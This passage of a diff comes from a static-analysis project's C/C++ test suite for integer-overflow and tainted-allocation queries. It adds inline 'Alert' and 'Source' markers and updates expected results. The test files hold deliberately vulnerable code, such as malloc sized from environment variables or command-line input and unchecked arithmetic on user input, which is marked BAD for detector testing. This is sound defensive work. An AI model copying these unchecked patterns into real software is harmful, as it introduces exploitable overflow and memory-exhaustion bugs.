0xFF00); c++) {} // BAD + for (c = 0; c < (x & 0xFF00); c++) {} // BAD // $ Alert x = get_a_uint(); - for (c = 0; c < (x & 0xFF0000); c++) {} // BAD + for (c = 0; c < (x & 0xFF0000); c++) {} // BAD // $ Alert x = get_a_uint(); - for (c = 0; c < (x & 0xFF000000); c++) {} // BAD + for (c = 0; c < (x & 0xFF000000); c++) {} // BAD // $ Alert x = get_a_uint(); - for (c = 0; c < (x >> 8); c++) {} // BAD + for (c = 0; c < (x >> 8); c++) {} // BAD // $ Alert x = get_a_uint(); - for (c = 0; c < (x >> 16); c++) {} // BAD + for (c = 0; c < (x >> 16); c++) {} // BAD // $ Alert x = get_a_uint(); for (c = 0; c < (x >> 24); c++) {} // GOOD (assuming 32-bit ints) x = get_a_uint(); @@ -125,7 +125,7 @@ void test13() { ux = get_a_uint(); uy = get_a_uint(); sz = ux & uy; - for (uc = 0; uc < sz; uc++) {} // BAD + for (uc = 0; uc < sz; uc++) {} // BAD // $ Alert ux = get_a_uint(); uy = get_a_uint(); @@ -136,7 +136,7 @@ void test13() { sx = get_an_int(); sy = get_an_int(); sz = (unsigned)sx & (unsigned)sy; - for (uc = 0; uc < sz; uc++) {} // BAD + for (uc = 0; uc < sz; uc++) {} // BAD // $ Alert sx = get_an_int(); sy = get_an_int(); @@ -153,7 +153,7 @@ void test14() { // BAD: 's' is compared with a value of a wider type. // 's' overflows before reaching 'sx', // causing an infinite loop - while (s < sx) { + while (s < sx) { // $ Alert s += 1; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected index 4235033abccc..e321000d0caa 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.expected @@ -1,3 +1,24 @@ +#select +| test.cpp:43:31:43:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:43:38:43:44 | tainted | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:44:31:44:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:44:38:44:63 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:46:31:46:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:46:38:46:63 | ... + ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:49:25:49:30 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:49:32:49:35 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:50:17:50:30 | new[] | test.cpp:39:27:39:30 | **argv | test.cpp:50:17:50:30 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:53:21:53:27 | call to realloc | test.cpp:39:27:39:30 | **argv | test.cpp:53:35:53:60 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | +| test.cpp:128:17:128:22 | call to malloc | test.cpp:124:18:124:31 | *call to getenv | test.cpp:128:24:128:41 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:124:18:124:31 | *call to getenv | user input (an environment variable) | +| test.cpp:135:3:135:8 | call to malloc | test.cpp:133:19:133:32 | *call to getenv | test.cpp:135:10:135:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:133:19:133:32 | *call to getenv | user input (an environment variable) | +| test.cpp:152:4:152:9 | call to malloc | test.cpp:148:20:148:33 | *call to getenv | test.cpp:152:11:152:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:148:20:148:33 | *call to getenv | user input (an environment variable) | +| test.cpp:194:4:194:9 | call to malloc | test.cpp:190:19:190:32 | *call to getenv | test.cpp:194:11:194:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:190:19:190:32 | *call to getenv | user input (an environment variable) | +| test.cpp:209:4:209:9 | call to malloc | test.cpp:205:19:205:32 | *call to getenv | test.cpp:209:11:209:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:205:19:205:32 | *call to getenv | user input (an environment variable) | +| test.cpp:261:14:261:19 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:261:21:261:21 | s | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | +| test.cpp:269:2:269:7 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:269:9:269:18 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | +| test.cpp:271:2:271:7 | call to malloc | test.cpp:241:14:241:27 | *call to getenv | test.cpp:271:9:271:24 | call to get_tainted_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:241:14:241:27 | *call to getenv | user input (an environment variable) | +| test.cpp:275:2:275:9 | call to my_alloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:275:11:275:20 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | +| test.cpp:293:4:293:9 | call to malloc | test.cpp:289:20:289:33 | *call to getenv | test.cpp:293:11:293:29 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:289:20:289:33 | *call to getenv | user input (an environment variable) | +| test.cpp:321:4:321:9 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:321:11:321:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | +| test.cpp:338:3:338:8 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:338:10:338:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | +| test.cpp:385:25:385:33 | call to MyMalloc1 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:385:35:385:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | +| test.cpp:386:25:386:33 | call to MyMalloc2 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:386:35:386:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | edges | test.cpp:39:27:39:30 | **argv | test.cpp:40:16:40:19 | call to atoi | provenance | TaintFunction | | test.cpp:40:16:40:19 | call to atoi | test.cpp:43:38:43:44 | tainted | provenance | | @@ -88,24 +109,3 @@ nodes | test.cpp:385:35:385:38 | size | semmle.label | size | | test.cpp:386:35:386:38 | size | semmle.label | size | subpaths -#select -| test.cpp:43:31:43:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:43:38:43:44 | tainted | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:44:31:44:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:44:38:44:63 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:46:31:46:36 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:46:38:46:63 | ... + ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:49:25:49:30 | call to malloc | test.cpp:39:27:39:30 | **argv | test.cpp:49:32:49:35 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:50:17:50:30 | new[] | test.cpp:39:27:39:30 | **argv | test.cpp:50:17:50:30 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:53:21:53:27 | call to realloc | test.cpp:39:27:39:30 | **argv | test.cpp:53:35:53:60 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:39:27:39:30 | **argv | user input (a command-line argument) | -| test.cpp:128:17:128:22 | call to malloc | test.cpp:124:18:124:31 | *call to getenv | test.cpp:128:24:128:41 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:124:18:124:31 | *call to getenv | user input (an environment variable) | -| test.cpp:135:3:135:8 | call to malloc | test.cpp:133:19:133:32 | *call to getenv | test.cpp:135:10:135:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:133:19:133:32 | *call to getenv | user input (an environment variable) | -| test.cpp:152:4:152:9 | call to malloc | test.cpp:148:20:148:33 | *call to getenv | test.cpp:152:11:152:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:148:20:148:33 | *call to getenv | user input (an environment variable) | -| test.cpp:194:4:194:9 | call to malloc | test.cpp:190:19:190:32 | *call to getenv | test.cpp:194:11:194:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:190:19:190:32 | *call to getenv | user input (an environment variable) | -| test.cpp:209:4:209:9 | call to malloc | test.cpp:205:19:205:32 | *call to getenv | test.cpp:209:11:209:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:205:19:205:32 | *call to getenv | user input (an environment variable) | -| test.cpp:261:14:261:19 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:261:21:261:21 | s | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | -| test.cpp:269:2:269:7 | call to malloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:269:9:269:18 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | -| test.cpp:271:2:271:7 | call to malloc | test.cpp:241:14:241:27 | *call to getenv | test.cpp:271:9:271:24 | call to get_tainted_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:241:14:241:27 | *call to getenv | user input (an environment variable) | -| test.cpp:275:2:275:9 | call to my_alloc | test.cpp:267:24:267:37 | *call to getenv | test.cpp:275:11:275:20 | local_size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:267:24:267:37 | *call to getenv | user input (an environment variable) | -| test.cpp:293:4:293:9 | call to malloc | test.cpp:289:20:289:33 | *call to getenv | test.cpp:293:11:293:29 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:289:20:289:33 | *call to getenv | user input (an environment variable) | -| test.cpp:321:4:321:9 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:321:11:321:28 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | -| test.cpp:338:3:338:8 | call to malloc | test.cpp:281:18:281:31 | *call to getenv | test.cpp:338:10:338:27 | ... * ... | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:281:18:281:31 | *call to getenv | user input (an environment variable) | -| test.cpp:385:25:385:33 | call to MyMalloc1 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:385:35:385:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | -| test.cpp:386:25:386:33 | call to MyMalloc2 | test.cpp:383:18:383:31 | *call to getenv | test.cpp:386:35:386:38 | size | This allocation size is derived from $@ and could allocate arbitrary amounts of memory. | test.cpp:383:18:383:31 | *call to getenv | user input (an environment variable) | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.qlref index df804c0942f4..2db07b995892 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/TaintedAllocationSize.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/TaintedAllocationSize.ql +query: Security/CWE/CWE-190/TaintedAllocationSize.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/test.cpp index e13c50a960b4..dfdebcf2478a 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/TaintedAllocationSize/test.cpp @@ -36,21 +36,21 @@ int getTainted() { return i; } -int main(int argc, char **argv) { +int main(int argc, char **argv) { // $ Source int tainted = atoi(argv[1]); MyStruct *arr1 = (MyStruct *)malloc(sizeof(MyStruct)); // GOOD - MyStruct *arr2 = (MyStruct *)malloc(tainted); // BAD - MyStruct *arr3 = (MyStruct *)malloc(tainted * sizeof(MyStruct)); // BAD + MyStruct *arr2 = (MyStruct *)malloc(tainted); // BAD // $ Alert + MyStruct *arr3 = (MyStruct *)malloc(tainted * sizeof(MyStruct)); // BAD // $ Alert MyStruct *arr4 = (MyStruct *)malloc(getTainted() * sizeof(MyStruct)); // BAD [NOT DETECTED] - MyStruct *arr5 = (MyStruct *)malloc(sizeof(MyStruct) + tainted); // BAD + MyStruct *arr5 = (MyStruct *)malloc(sizeof(MyStruct) + tainted); // BAD // $ Alert int size = tainted * 8; - char *chars1 = (char *)malloc(size); // BAD - char *chars2 = new char[size]; // BAD + char *chars1 = (char *)malloc(size); // BAD // $ Alert + char *chars2 = new char[size]; // BAD // $ Alert char *chars3 = new char[8]; // GOOD - arr1 = (MyStruct *)realloc(arr1, sizeof(MyStruct) * tainted); // BAD + arr1 = (MyStruct *)realloc(arr1, sizeof(MyStruct) * tainted); // BAD // $ Alert size = 8; chars3 = new char[size]; // GOOD @@ -121,18 +121,18 @@ int bounded(int x, int limit) { } void open_file_bounded () { - int size = atoi(getenv("USER")); + int size = atoi(getenv("USER")); // $ Source int bounded_size = bounded(size, MAX_SIZE); int* a = (int*)malloc(bounded_size * sizeof(int)); // GOOD - int* b = (int*)malloc(size * sizeof(int)); // BAD + int* b = (int*)malloc(size * sizeof(int)); // BAD // $ Alert } void more_bounded_tests() { { - int size = atoi(getenv("USER")); + int size = atoi(getenv("USER")); // $ Source - malloc(size * sizeof(int)); // BAD + malloc(size * sizeof(int)); // BAD // $ Alert } { @@ -145,11 +145,11 @@ void more_bounded_tests() { } { - long size = atol(getenv("USER")); + long size = atol(getenv("USER")); // $ Source if (size > 0) { - malloc(size * sizeof(int)); // BAD + malloc(size * sizeof(int)); // BAD // $ Alert } } @@ -187,11 +187,11 @@ void more_bounded_tests() { } { - int size = atoi(getenv("USER")); + int size = atoi(getenv("USER")); // $ Source if (size % 100) { - malloc(size * sizeof(int)); // BAD + malloc(size * sizeof(int)); // BAD // $ Alert } } @@ -202,11 +202,11 @@ void more_bounded_tests() { } { - int size = atoi(getenv("USER")); + int size = atoi(getenv("USER")); // $ Source if (size & 7) { - malloc(size * sizeof(int)); // BAD + malloc(size * sizeof(int)); // BAD // $ Alert } } @@ -238,7 +238,7 @@ size_t get_untainted_size() size_t get_tainted_size() { - return atoi(getenv("USER")) * sizeof(int); + return atoi(getenv("USER")) * sizeof(int); // $ Source } size_t get_bounded_size() @@ -258,27 +258,27 @@ void *my_alloc(size_t s) { } void my_func(size_t s) { - void *ptr = malloc(s); // BAD + void *ptr = malloc(s); // BAD // $ Alert free(ptr); } void more_cases() { - int local_size = atoi(getenv("USER")) * sizeof(int); + int local_size = atoi(getenv("USER")) * sizeof(int); // $ Source - malloc(local_size); // BAD + malloc(local_size); // BAD // $ Alert malloc(get_untainted_size()); // GOOD - malloc(get_tainted_size()); // BAD + malloc(get_tainted_size()); // BAD // $ Alert malloc(get_bounded_size()); // GOOD my_alloc(100); // GOOD - my_alloc(local_size); // BAD + my_alloc(local_size); // BAD // $ Alert my_func(100); // GOOD my_func(local_size); // GOOD } bool get_size(int &out_size) { - out_size = atoi(getenv("USER")); + out_size = atoi(getenv("USER")); // $ Source return true; } @@ -286,11 +286,11 @@ bool get_size(int &out_size) { void equality_cases() { { int size1 = atoi(getenv("USER")); - int size2 = atoi(getenv("USER")); + int size2 = atoi(getenv("USER")); // $ Source if (size1 == 100) { - malloc(size2 * sizeof(int)); // BAD + malloc(size2 * sizeof(int)); // BAD // $ Alert } if (size2 == 100) { @@ -318,7 +318,7 @@ void equality_cases() { if ((get_size(size)) && (size != 100)) { - malloc(size * sizeof(int)); // BAD + malloc(size * sizeof(int)); // BAD // $ Alert } } { @@ -335,7 +335,7 @@ void equality_cases() { if ((!get_size(size)) || (size == 100)) return; - malloc(size * sizeof(int)); // BAD + malloc(size * sizeof(int)); // BAD // $ Alert } { int size = atoi(getenv("USER")); @@ -380,8 +380,8 @@ void *MyMalloc2(size_t size); void customAllocatorTests() { - int size = atoi(getenv("USER")); + int size = atoi(getenv("USER")); // $ Source - char *chars1 = (char *)MyMalloc1(size); // BAD - char *chars2 = (char *)MyMalloc2(size); // BAD + char *chars1 = (char *)MyMalloc1(size); // BAD // $ Alert + char *chars2 = (char *)MyMalloc2(size); // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected index 34aa8a7a7e4a..795895891407 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.expected @@ -1,3 +1,15 @@ +#select +| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | +| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | +| test2.cpp:39:9:39:11 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:39:9:39:11 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | +| test2.cpp:40:3:40:5 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:40:3:40:5 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | +| test5.cpp:17:6:17:18 | call to getTaintedInt | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:17:6:17:18 | call to getTaintedInt | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | +| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | +| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | +| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | +| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | +| test.c:44:7:44:10 | len2 | main.cpp:7:27:7:30 | **argv | test.c:44:7:44:10 | len2 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | +| test.c:54:7:54:10 | len3 | main.cpp:7:27:7:30 | **argv | test.c:54:7:54:10 | len3 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | edges | main.cpp:7:27:7:30 | **argv | main.cpp:8:17:8:20 | **argv | provenance | | | main.cpp:8:17:8:20 | **argv | test.c:10:28:10:31 | **argv | provenance | | @@ -53,15 +65,3 @@ nodes | test.c:54:7:54:10 | len3 | semmle.label | len3 | | test.c:54:7:54:12 | ... -- | semmle.label | ... -- | subpaths -#select -| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | -| test2.cpp:14:11:14:11 | v | test2.cpp:25:22:25:23 | fscanf output argument | test2.cpp:14:11:14:11 | v | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | test2.cpp:25:22:25:23 | fscanf output argument | value read by fscanf | -| test2.cpp:39:9:39:11 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:39:9:39:11 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | -| test2.cpp:40:3:40:5 | num | test2.cpp:36:9:36:14 | fgets output argument | test2.cpp:40:3:40:5 | num | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test2.cpp:36:9:36:14 | fgets output argument | string read by fgets | -| test5.cpp:17:6:17:18 | call to getTaintedInt | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:17:6:17:18 | call to getTaintedInt | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | -| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | -| test5.cpp:19:6:19:6 | y | test5.cpp:9:7:9:9 | gets output argument | test5.cpp:19:6:19:6 | y | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | test5.cpp:9:7:9:9 | gets output argument | string read by gets | -| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an overflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | -| test.c:14:15:14:28 | maxConnections | main.cpp:7:27:7:30 | **argv | test.c:14:15:14:28 | maxConnections | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | -| test.c:44:7:44:10 | len2 | main.cpp:7:27:7:30 | **argv | test.c:44:7:44:10 | len2 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | -| test.c:54:7:54:10 | len3 | main.cpp:7:27:7:30 | **argv | test.c:54:7:54:10 | len3 | $@ flows to an operand of an arithmetic expression, potentially causing an underflow. | main.cpp:7:27:7:30 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.qlref index 3939653db1c3..d8fb26f7e023 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/ArithmeticTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/ArithmeticTainted.ql +query: Security/CWE/CWE-190/ArithmeticTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/IntegerOverflowTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/IntegerOverflowTainted.qlref index df42008c632b..419ed80f3b9e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/IntegerOverflowTainted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/IntegerOverflowTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/IntegerOverflowTainted.ql +query: Security/CWE/CWE-190/IntegerOverflowTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/main.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/main.cpp index 645b5893deaa..2a91b61f5fab 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/main.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/main.cpp @@ -4,7 +4,7 @@ int main3(int argc, char** argv); } int main4(int argc, char** argv); -int main(int argc, char** argv) { +int main(int argc, char** argv) { // $ Source[cpp/tainted-arithmetic] main1(argc, argv); main3(argc, argv); main4(argc, argv); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test.c index b39e54084ac3..cd42710fa1e5 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test.c @@ -11,7 +11,7 @@ int main1(int argc, char** argv) { int maxConnections = atoi(argv[1]); // BAD: arithmetic on a user input without any validation - startServer(maxConnections * 1000); + startServer(maxConnections * 1000); // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] // GOOD: check the user input first int maxConnections2 = atoi(argv[1]); @@ -41,7 +41,7 @@ int main1(int argc, char** argv) { len2 = atoi(argv[1]); while (len2) { - len2--; // BAD: can underflow, if len2 is initially negative. + len2--; // BAD: can underflow, if len2 is initially negative. // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] } } @@ -51,7 +51,7 @@ int main1(int argc, char** argv) { len3 = atoi(argv[1]); while (len3 != 0) { - len3--; // BAD: can underflow, if len3 is initially negative. + len3--; // BAD: can underflow, if len3 is initially negative. // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test2.cpp index 1cf12a197f4d..b656c39a0ca0 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test2.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test2.cpp @@ -11,10 +11,10 @@ typedef struct _myStruct { void test2_sink(s64 v, MyStruct s, MyStruct &s_r, MyStruct *s_p) { - s64 v1 = v * 2; // bad - s64 v2 = s.val * 2; // bad - s64 v3 = s_r.val * 2; // bad - s64 v4 = s_p->val * 2; // bad + s64 v1 = v * 2; // bad // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] + s64 v2 = s.val * 2; // bad // $ Alert[cpp/integer-overflow-tainted] + s64 v3 = s_r.val * 2; // bad // $ Alert[cpp/integer-overflow-tainted] + s64 v4 = s_p->val * 2; // bad // $ Alert[cpp/integer-overflow-tainted] } void test2_source() @@ -22,7 +22,7 @@ void test2_source() MyStruct ms; s64 v; - fscanf(stdin, "%i", &v); + fscanf(stdin, "%i", &v); // $ Source[cpp/tainted-arithmetic] ms.val = v; test2_sink(v, ms, ms, &ms); } @@ -33,9 +33,9 @@ int atoi(const char *); void test3() { char buffer[20]; - fgets(buffer, 20, stdin); + fgets(buffer, 20, stdin); // $ Source[cpp/tainted-arithmetic] int num = atoi(buffer); - num = num + 1000; // BAD - num += 1000; // BAD + num = num + 1000; // BAD // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] + num += 1000; // BAD // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test3.c b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test3.c index a8116e058530..f24b640810de 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test3.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/tainted/test3.c @@ -9,8 +9,8 @@ // from a macro that is defined in a system header. int main3(int argc, char **argv) { char *cmd = argv[0]; - int x = 